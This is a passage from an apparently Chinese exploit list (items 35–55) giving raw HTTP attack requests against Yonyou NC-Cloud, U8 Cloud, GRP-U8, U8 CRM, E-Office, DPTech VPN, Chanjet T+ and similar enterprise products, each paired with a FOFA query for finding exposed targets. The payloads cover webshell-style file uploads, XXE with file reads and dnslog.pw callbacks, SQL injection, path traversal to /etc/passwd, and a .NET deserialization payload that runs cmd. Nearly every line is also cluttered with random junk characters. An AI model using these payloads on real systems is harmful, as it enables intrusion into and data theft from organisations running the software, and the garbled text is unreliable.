User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ \3 A2 D8 f! W( f! N% }! o3 \
Content-Type: application/x-www-form-urlencoded' E4 X3 E8 f* M0 U
Accept-Encoding: gzip, deflate
. S/ \. g. q& I: [4 P: f% h" o4 c9 AAccept: */*
5 k1 I6 W- t2 y0 _2 k& L6 ~, PConnection: keep-alive# f( Q7 y7 V" b/ L2 c( Q# n! G' \, n

/ o+ M$ A8 m+ H* w9 t: P' k
! l1 L( A, j4 o2 r' a35. 用友NC-Cloud importhttpscer任意文件上传1 {$ D% R) _4 a+ Z2 I0 K) d
FOFA:app="用友-NC-Cloud") T) I% S, o  B% ]+ N; K3 p) J
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
. M0 p) x# |5 p1 A9 a# |Host: 203.25.218.166:8888
* q: K8 u' }! ?User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
" \* J, Z' d. ]# _. q" F: |Accept-Encoding: gzip, deflate
" ~) K$ m( _: g0 f% nAccept: */*1 v8 k7 @2 _9 k6 S
Connection: close/ D+ t9 J+ ^  g; i% P
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
3 o* i9 @3 v+ {2 @) ^  o/ S# jContent-Length: 1901 c% O7 B% w' m
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
! G, c2 T$ m8 t1 c/ G
& q, Y0 L: m& J3 b0 \7 g--fd28cb44e829ed1c197ec3bc71748df0
# A( ?; h, X. p3 HContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
+ l/ y7 K# F( X' s8 |0 Y
! h) Z4 b" M3 Q" W. {7 @- \<%out.println(1111*1111);%>
1 h2 t5 P; C1 B) f( }) m! g( r1 b) C--fd28cb44e829ed1c197ec3bc71748df0--! d# X6 Z) B& B/ P- y- W

$ F0 J% d$ d" `) K' {; c2 K) b1 P( T; Q- }. q! \
36. 用友NC-Cloud soapFormat XXE- }6 K8 d7 S# E- c, i# Q7 n- {
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"+ X% K* C( p; `: g7 ~- s6 J& M
POST /uapws/soapFormat.ajax HTTP/1.1# f9 U- `" b; p# ]
Host: 192.168.40.130:89899 u- [2 ^, W: R3 C0 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0$ s" H9 {( ?0 Q
Content-Length: 263
+ O4 P: C5 W5 b) ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# ~  h5 C( H" B8 P, K
Accept-Encoding: gzip, deflate  I& |3 E0 o7 A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 a! P$ N/ f, a/ ~/ NConnection: close
# D* Y% W0 Q& y# cContent-Type: application/x-www-form-urlencoded
' g- @0 l' m) G; V) M# P3 DUpgrade-Insecure-Requests: 1) V" o5 J8 a& p, e' Y0 j

' k9 \. u6 y# P4 t2 M9 {, kmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a! X' Y5 c; ~3 E& U8 {, B3 @2 e

' _- Q3 s  L+ x7 O! ]2 ?
/ K5 S5 }" t: \& t37. 用友NC-Cloud IUpdateService XXE
1 r0 H) `+ O; U) L+ Q' d8 B  _FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
$ m" @3 W- j% \* ]POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1  D9 e, g" ^# h7 F+ f# \5 S3 D
Host: 192.168.40.130:8989
0 c9 E" Q( z5 {- ^" ]. j: d# C- VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
; s+ T5 C6 W" Q/ Z& k6 |! GContent-Length: 421
: ^: g# K9 p- y  L9 wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
* x( o$ H3 c1 C3 O) FAccept-Encoding: gzip, deflate
4 ]/ ~% b( M' \1 F( l* X* [Accept-Language: zh-CN,zh;q=0.98 V3 E" M7 _# h* J$ o
Connection: close
" N3 M  z3 S8 Y7 OContent-Type: text/xml;charset=UTF-80 W( s" V3 N) `
SOAPAction: urn:getResult
: }5 D& O; ?- m2 H9 Z* k% [Upgrade-Insecure-Requests: 1. M% t  c6 P; i

. j. k6 a6 Z, A- a" q<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">1 ^& m, A- a+ G' I0 s
<soapenv:Header/>
, w) x9 `: X1 k8 A<soapenv:Body>/ k* }# d0 i7 I4 S' T# X" D! l. K" @
<iup:getResult>
/ n, Q5 O* k. D: Y& A<!--type: string-->
3 P& D8 ?7 K9 H/ |2 j9 t<iup:string><![CDATA[! O- X( e! A+ ^" p
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>8 R$ t6 {0 q# v' o6 L+ s
<xxx/>]]></iup:string>
( l; L# ~0 H& N0 L7 @</iup:getResult>
7 h( j  A1 ~; t* q) S2 `5 P& _</soapenv:Body>
4 l2 U( z( N2 p" M</soapenv:Envelope>: q5 k2 B# \& f

7 y- e1 M: u$ K% f0 k5 M) l" ]
( o  u% N# r2 v2 k! L( w% ]
8 l9 o9 k1 O' \" a& x+ p38. 用友U8 Cloud smartweb2.RPC.d XXE
1 d' ]2 A; N9 _$ W7 X$ P9 [FOFA:app="用友-U8-Cloud"
! X. ^- S2 z9 c; m% I2 OPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1. H9 H0 C( \. {% W3 j
Host: 192.168.40.131:8088
6 v  R) |/ n7 q% y# g) ^8 c3 xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
" X" c. k( h' t& w7 iContent-Length: 260/ T- s, U7 i% @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b33 o3 j% R. T, h
Accept-Encoding: gzip, deflate* A/ E1 U  u& H  n6 C& t
Accept-Language: zh-CN,zh;q=0.9' g- f' `2 e" I+ d
Connection: close
' e7 ]6 g: i8 k$ v+ QContent-Type: application/x-www-form-urlencoded, |4 u, F$ h" y
* _) Y, S- b0 }" c8 Z8 N* H
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
1 b* L% |% Z2 b  C; e/ k% y
& o  x, z& ]" e
2 _' F7 K3 j" J# i- T+ B39. 用友U8 Cloud RegisterServlet SQL注入; m8 @4 H/ |0 u4 s: s& ~+ A0 l, z
FOFA:title="u8c"
$ d4 x, Y7 M1 |% WPOST /servlet/RegisterServlet HTTP/1.1
  n' ?# r* R1 P% {, vHost: 192.168.86.128:80894 ?3 b5 s, U, L- j# ]1 _" Y) F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
# r4 Y3 @7 ^8 |; K# iConnection: close% J( Y! o/ L* C, d3 u; X
Content-Length: 85. |1 w2 r, Y8 f
Accept: */*
, v3 Q5 w& Z# }$ CAccept-Language: en
' m0 H3 l# n6 j5 O* ^$ v' GContent-Type: application/x-www-form-urlencoded3 x5 E* }: t3 @
X-Forwarded-For: 127.0.0.18 h4 ^2 [' q% `: X& D
Accept-Encoding: gzip4 N5 I3 K  x; A

9 M: o, M/ F1 u5 G7 Z; G4 @2 uusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
. `: p1 X9 J7 G' h8 s
) T7 o" b3 P8 b' O: N9 v; d% V% }
6 C: v5 m; d7 ?, _1 f3 R' t1 `40. 用友U8-Cloud XChangeServlet XXE( R( [0 E( I5 d
FOFA:app="用友-U8-Cloud"( X) n2 H+ i, q6 I7 H
POST /service/XChangeServlet HTTP/1.1
5 N- h) b4 H) f* h4 KHost: x.x.x.x
  W7 }7 @4 a% ?/ H. ^User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 x0 @0 |  X2 @Content-Type: text/xml
5 P: c+ O+ t( h; |, f) N% kConnection: close! v% V; |, j3 L' V8 }7 y* y
+ V  v1 D' h) F- T) @
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>$ [# G' `# o# F6 }+ x
( C( C; [5 Y& T& s

1 K* V& I- Y0 Q; h41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
; k0 `) r+ m' G: B; V" i5 MFOFA:app="用友-U8-Cloud"
, |# J) U& g% @& q+ ?  n# P# ?9 IGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
% z  Q3 }- k% {8 }Host:
; g0 F' P7 Z2 L0 x, N- q* ^% YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% q2 P. [4 _8 t: WContent-Type: application/json
4 u! X  y' i4 eAccept-Encoding: gzip
- S0 j3 F5 D; v" o8 k# r* L/ }Connection: close
- J  [) ]/ Z5 D4 b7 X
+ k# h2 b( Z- `+ s1 r! e. B' s. ^8 ?
42. 用友GRP-U8 SmartUpload01 文件上传, \: V8 ?. M  t3 {/ M/ w
FOFA:app="用友-GRP-U8"
: G) A2 L$ Q- m9 R9 w. J! i  M/ EPOST /u8qx/SmartUpload01.jsp HTTP/1.1
4 q( \! ^, F5 \1 J+ AHost: x.x.x.x
: \# _0 C9 \  T: Z% g1 |Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
# i  T; V+ X5 g: y, Q+ s5 U, P% oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
: S5 d2 J+ L9 Z- ]9 Z' s  `0 ?0 ~
/ J5 v( a/ O5 ]3 S1 A, C$ DPAYLOAD, r0 `" n" ^6 v6 t7 H# m
# Q4 G; |6 i/ l1 d1 v8 Z

% l5 Z$ ?4 k/ qhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
/ U5 T8 T9 _/ c/ t1 y  _! y: A  W; ^0 d8 D, f) C% T
43. 用友GRP-U8 userInfoWeb SQL注入致RCE; y8 P) I' S3 [+ o7 L& Z
FOFA:app="用友-GRP-U8"# n* n* i! X# w6 R
POST /services/userInfoWeb HTTP/1.1& A9 _$ [+ E: `, X5 T0 {
Host: your-ip
5 M0 s. _1 m- zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
% f" L7 O: y  r" c3 S2 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# f9 d! y- J  `Accept-Encoding: gzip, deflate
, r, v; \4 L& G! Z% l' j# U0 QAccept-Language: zh-CN,zh;q=0.9- z; @3 o* w4 D1 P% |
Connection: close
" W9 C1 T; H7 r$ E# z8 SSOAPAction:( V5 u& N+ l6 N" W5 \  g
Content-Type: text/xml;charset=UTF-8
; v, x0 R) @' C) f. \
: C( E) O6 v* F5 K) [<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">2 h/ L8 Y% V! I) j5 C
   <soapenv:Header/>
4 L5 {3 j4 Y, }* z* y   <soapenv:Body>
9 h) K. |9 P5 y$ e2 x      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"># J  v" a1 ?4 i( l3 o% P5 B
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
& F: w4 p# e1 G- M- C. z      </ser:getUserNameById>, t! U5 F8 \3 [+ G* E  M' V
   </soapenv:Body>
1 `6 Q2 N% d" q0 G$ g: p</soapenv:Envelope>
: ?" q& V2 |# W& s% ?1 N& K# }- ]& K
$ l: j: h8 O  U5 y" C
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
0 e: g. S: \# Q5 R7 ^7 AFOFA:app="用友-GRP-U8"5 f( L1 Q- ?) t, S
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1/ @" P& ~  e7 N+ G9 p
Host: your-ip% o3 `4 }+ k% b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
7 k' [6 J( }9 W8 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ H: b! P# R1 i3 K. WAccept-Encoding: gzip, deflate
, V1 h$ z4 b0 S3 Z5 `" KAccept-Language: zh-CN,zh;q=0.98 Y: w( \/ M* J
Connection: close
: ^  ~) ?; o# k0 y
3 m+ d, O: d" v1 c. C8 ?' ^" V# |
+ N5 i* o0 m1 O45. 用友GRP-U8 ufgovbank XXE
. H* q, {" S1 ^7 S9 b- Y8 N, ]1 TFOFA:app="用友-GRP-U8"
: j) V+ }+ G) `POST /ufgovbank HTTP/1.1
2 u( @: m4 u; G, P# I+ HHost: 192.168.40.130:222& W% T7 f3 _( t5 I- T3 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
% ~" B2 c1 q; x) j& o2 W2 }Connection: close
/ C+ x2 v: z! k. EContent-Length: 161; s' ~3 \( R% Q' {% j6 A5 p3 G1 m4 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. L+ }7 o6 j9 [% y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 W6 K- K& K2 A) x
Content-Type: application/x-www-form-urlencoded" _" T0 W  k0 H% v3 i
Accept-Encoding: gzip- j# P& Z  g9 p: V

* J  m( S# f# G3 |" N& ]/ freqData=<?xml version="1.0"?>
% ?" p7 T. Y. \<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
0 ]! N7 K" u8 n+ N/ K3 p" P4 y+ O2 {+ {# ^$ B" c" ]1 q

% c0 u1 |( Q  O8 t4 ]- b9 V46. 用友GRP-U8 sqcxIndex.jsp SQL注入
5 }* v$ \( Z  {2 x" `* KFOFA:app="用友-GRP-U8"
: t; ^7 V+ ?5 I0 B. \! R. ?, k4 dGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
9 L) N" |: W. y& S6 rHost: your-ip; X: o. J: S' A/ b3 k8 Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36$ G/ [$ Z. I: c! G6 z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* B- t& t7 ~1 T- cAccept-Encoding: gzip, deflate2 c% X) G: r* `1 d& O
Accept-Language: zh-CN,zh;q=0.9, J* \  B0 ]$ @* f  A1 J
Connection: close
/ E1 b! L( P0 n$ x3 y) }$ [$ ^* t
' M0 h$ K: G, f0 b: P) g8 X) l8 H8 ?/ j
* p5 W' v' l' D* ^, x7 m; c47. 用友GRP A++Cloud 政府财务云 任意文件读取
, x, _9 l- |2 P% kFOFA:body="/pf/portal/login/css/fonts/style.css"  ]0 k3 L2 t6 |4 d
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
" I# I+ H% Q9 c# M3 G1 ]; PHost: x.x.x.x9 ]/ G. s. Y. ~0 t( I0 t
Cache-Control: max-age=0
: h' a6 w1 s+ g: S  g4 BUpgrade-Insecure-Requests: 1
6 t( G1 t. f4 ^! f7 V  l9 N3 j  w* rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36) d3 A: u! @  y  X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: M. F7 J5 p1 I9 U/ b4 {Accept-Encoding: gzip, deflate, br. q- [2 Z+ [. C: f
Accept-Language: zh-CN,zh;q=0.92 R! H9 u# y( D7 `$ C! w
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT5 M; U, f* C0 O2 k6 |' r
Connection: close
3 |; L. ^6 e( n7 c
* I* ?* M) Q* g( A  l6 b6 G  f  C  L2 L* Z3 M& b7 w+ O& }

- u9 v( y% O7 ~48. 用友U8 CRM swfupload 任意文件上传$ H0 k5 R4 L. Z
FOFA:title="用友U8CRM"
5 Q+ ?0 r: i% JPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
4 Y+ w  |- f% r+ [' }4 gHost: your-ip5 p! F! `, ~: e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  H$ P" a9 T  s* d# ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: s7 A/ b( s- Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 t  Z" Q# g8 D1 p4 [Accept-Encoding: gzip, deflate7 R  d8 b# f7 @1 O8 e, z% `0 P* \. H
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
) x# \  d% p) [8 T, p1 F. y0 }------269520967239406871642430066855, S) K- k7 W2 |' H* m4 J
Content-Disposition: form-data; name="file"; filename="s.php"- d+ h6 y. N$ J& z2 [
1231
' K7 S: S# ^/ W9 i2 \+ q8 ^Content-Type: application/octet-stream
( i" \& x9 |5 L. r2 ~4 O------269520967239406871642430066855+ r) Q" R, R" }; O$ Z
Content-Disposition: form-data; name="upload"
# a' I/ E5 S9 M+ Dupload- [' N+ \9 Q! x. P( r
------269520967239406871642430066855--3 [9 _5 S5 C4 d, @

7 d7 U; _! H6 D. m7 o2 ]/ |( T. L  s
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
2 e4 h9 N9 z! m5 [. q8 E, LFOFA:body="用友U8CRM"
5 @) q3 I, D" }  \+ D# l
7 b* d  @# M# |  {% xPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1, R" I+ ^, l3 Y
Host: x.x.x.x$ {  t+ H. K) Q; P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
7 g3 @4 s  b4 w/ l8 J5 X& GContent-Length: 329' U) M5 [2 m9 l- c0 t; S5 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% i9 I, g. a8 l
Accept-Encoding: gzip, deflate
0 T: c; i" b" t, b% w: B8 N4 HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, z" O7 h" Y. V0 d
Connection: close
+ ~! ]3 Z/ @8 K2 GContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w3 m1 l. p. P4 `: k% V) I

: @- j, z% s! d3 ?3 c# V6 ~-----------------------------vvv3wdayqv3yppdxvn3w
, J1 n! O; }' M7 F6 r8 K; n5 YContent-Disposition: form-data; name="file"; filename="%s.php "
% z7 T- Y, ~, C6 M* KContent-Type: application/octet-stream( T7 Z* M7 N# Z! u3 {: |+ `% l

, [- ?, I, }: [; _8 d( vwersqqmlumloqa
  x0 Z* R" c) |0 C: N- W-----------------------------vvv3wdayqv3yppdxvn3w4 }5 i" A+ |+ V& E
Content-Disposition: form-data; name="upload"
  v# H) H- G8 o! Z6 ^/ t5 }; W! D& R2 Z
upload' F) W" H" z6 |/ d/ A  j; m0 Z4 c/ _) J
-----------------------------vvv3wdayqv3yppdxvn3w--2 W1 p( P# _* v. P& B# |8 c
$ x4 t8 A) }" p/ T4 H% r, S* T' b

9 S. T2 g; t7 ?- ohttp://x.x.x.x/tmpfile/updB3CB.tmp.php' d( ?$ i2 @7 g% j

# y' b/ b& f# v( [50. QDocs Smart School 6.4.1 filterRecords SQL注入- [( W/ }* j' F  W& x. i4 ~( ~* d- L
FOFA:body="close closebtnmodal", f" K- B8 p! J
POST /course/filterRecords/ HTTP/1.1
+ F* Z( r- w* s! z) h" dHost: x.x.x.x
, h( ?  w. j4 v7 d& M3 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
  I1 Y1 d/ h+ G, H! x% `' a' kConnection: close
0 x% G* f2 ^; ~' BContent-Length: 224% j; w5 i" {+ Y! u* i& {% g
Accept: */*
& W) z; E1 O7 o1 x. W1 MAccept-Language: en2 A+ g/ a# _+ z& G" ~" j* R
Content-Type: application/x-www-form-urlencoded& Y$ r: G9 P1 f
Accept-Encoding: gzip
9 F% \  x  B. R; @9 M
! ?& x: i4 ?0 k! X& Ssearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
3 b/ S9 C- ^; U4 q0 |. T6 f
9 y+ [% H7 I' v7 o; q9 V
5 w& J* n+ H% g51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
9 {0 k1 o& r- n" z- aFOFA:app="云时空社会化商业ERP系统"2 W" q' ~8 z" L9 c! N
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
8 p3 B" G% w9 bHost: your-ip! d7 E7 C7 [/ n7 m! n; A4 O3 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.366 v" d/ p2 t. r0 x+ P! u! Z( z6 _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9& i0 O2 m# a2 S9 [3 U
Accept-Encoding: gzip, deflate
3 j8 b4 B: ~8 j  Y* |+ L1 E+ o* P8 LAccept-Language: zh-CN,zh;q=0.9
; B5 ?$ k  r% I% i. E! RConnection: close
. O+ A5 l* ~% c4 q1 [
0 n* R  G" c# [0 |% l- ]! X1 E4 ]$ d  F+ R8 j$ y" z+ X0 q5 y) L, }
52. 泛微E-Office json_common.php sql注入
4 {# [$ V0 m5 a3 nFOFA:app="泛微-EOffice") V% _/ V4 y& G, ?* v5 Y
POST /building/json_common.php HTTP/1.1
& |% k6 t* g2 M0 ]6 d( j  o- S0 M% PHost: 192.168.86.128:8097
) B" j9 x. M. A8 [User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.365 A. ]/ W. h1 a1 F3 M) B
Connection: close
2 {1 T* V& C; J+ N- o& cContent-Length: 87, c$ S! c' Z" }: a; v! O6 Z
Accept: */*
2 q. z8 v6 w8 v1 [Accept-Language: en
9 P9 O. ~8 @  W! W* A& ZContent-Type: application/x-www-form-urlencoded/ i7 m/ @# O. N* f& P$ _
Accept-Encoding: gzip5 G9 J/ w$ g: x( j0 _

/ {9 X0 G9 Q2 J' X. E; W" ftfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
& K0 ?# z, V1 c$ t0 y: F- H. |# R- P
5 w. z' h7 ^$ h" r
53. 迪普 DPTech VPN Service 任意文件上传
7 l( f; ?% ?1 F* XFOFA:app="DPtech-SSLVPN"
) Y2 l3 u# p3 e8 l- m; n% `1 b/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd) i& t$ s3 V' s$ x
3 r% f1 q4 ]# m+ p
5 E6 ?. A- u: g& y* r" n+ ^4 k3 Z1 q
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
+ U' b9 V; X( t+ [FOFA:app="畅捷通-TPlus"+ T/ y7 Z9 G: ~# K+ K* Y! v
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件# U8 J7 W0 h- @
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt") M( k+ {7 S, f+ g4 J/ x" e3 o& j3 Q

5 {! I. p" Z( J+ n
2 P5 \9 V, d' q, f1 }7 M' p' @完整数据包; Y* F) v/ w/ V. ?) r; V& t1 w5 z$ j: H
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
5 r+ H$ q2 P0 Y8 N" }; X% z; UHost: x.x.x.x
+ f, E- V3 u- c) }* U0 MUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F; f+ X7 W7 d. \
Content-Length: 593
# |% D/ P! l4 {/ U0 X! o9 ^. D0 y* @6 B
{+ Y4 U0 y! z& V2 c4 l4 k
"storeID":{
2 \& {: H+ O1 `# K# @5 A1 ~) x "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
6 |; ]2 W9 u- ~6 p "MethodName":"Start",
6 x9 F  I4 k6 j8 \# O  g. t  "ObjectInstance":{4 V/ Q  t/ o4 u, {8 R# L
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
4 _1 m! t. E0 D0 Z2 g    "StartInfo":{, Y! w# n  O; z. f
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
& b) [( w/ j- {  _( m$ z    "FileName":"cmd",) ~6 H9 o* s8 o/ i4 i$ }
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"6 I) m; p/ g: B& P
    }
$ V1 R, S0 n/ h- F  }
& A2 S! ^) X1 M- o8 ~( _! F  }
4 s$ ]" }8 w9 b) q1 h3 ]1 A2 t- q+ @}
) j8 i. E; P: d7 Q. H
0 |( U, D" W7 G3 G' x0 i2 x( v& M% u, q9 B. A
第二步,访问如下url: D) j2 D6 u2 z$ ~
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
) d4 r7 W$ f, a* t7 g7 u5 L' p' o) g  O
0 S: e, U: o* i" S) l/ n6 Z9 r
55. 畅捷通T+ getdecallusers信息泄露% U! x2 s# r6 F* }4 Q" O
FOFA:app="畅捷通-TPlus"
2 q+ n1 R: \6 v' v8 W# d) u" [, f$ y1 u第一步,通过
5 T' A, F# x, ]8 M( ]+ Z3 K$ T/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie/ ?7 \" s7 [. o! @, t1 }
第二步,利用获取到的Cookie请求% |# B( O2 f* y+ `
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
0 Z1 `  W: l4 K+ k, \
